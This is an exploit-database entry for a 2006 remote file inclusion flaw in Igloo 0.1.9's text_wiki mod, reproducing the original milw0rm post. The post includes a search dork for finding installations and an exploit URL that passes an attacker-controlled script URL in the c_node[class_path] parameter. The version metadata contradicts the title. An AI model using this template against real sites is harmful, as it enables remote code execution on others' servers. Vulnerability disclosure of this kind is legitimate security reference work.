Igloo 0.1.9 and prior [(text_wiki mod)] - Remote File Include Vulnerabilities

vendor:

Igloo

by:

Kacper (Rahim)

7.5

CVSS

HIGH

Remote File Include

CWE

Product Name: Igloo

Affected Version From: 2000.1.9

Affected Version To: 2000.1.9

Patch Exists: YES

Related CWE: N/A

CPE: a:igloo_project:igloo

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

Igloo 0.1.9 and prior [(text_wiki mod)] – Remote File Include Vulnerabilities

A vulnerability in Igloo 0.1.9 and prior versions allows remote attackers to include arbitrary files via a URL in the c_node[class_path] parameter to class/Wiki/Wiki.php.

Mitigation:

Upgrade to the latest version of Igloo.

Source

Exploit-DB raw data:

################ DEVIL TEAM THE BEST POLISH TEAM #################
#
# Igloo 0.1.9 and prior [(text_wiki mod)] - Remote File Include Vulnerabilities
# Script site: http://download.savannah.nongnu.org/releases/igloo/
# dork: Igloo (interest group glue)
# Find by Kacper (Rahim).
# Greetings; DragonHeart, Satan, Leito, Leon, Luzak, Adam, DeathSpeed, Drzewko, pepi
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Special greetz DragonHeart :***
# and greetz str0ke  :-)
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
#
##################################################################
Expl:

http://www.site.com/[Igloo_path]/class/Wiki/Wiki.php?c_node[class_path]=[evil_scripts]


#Elo ;-)

# milw0rm.com [2006-06-02]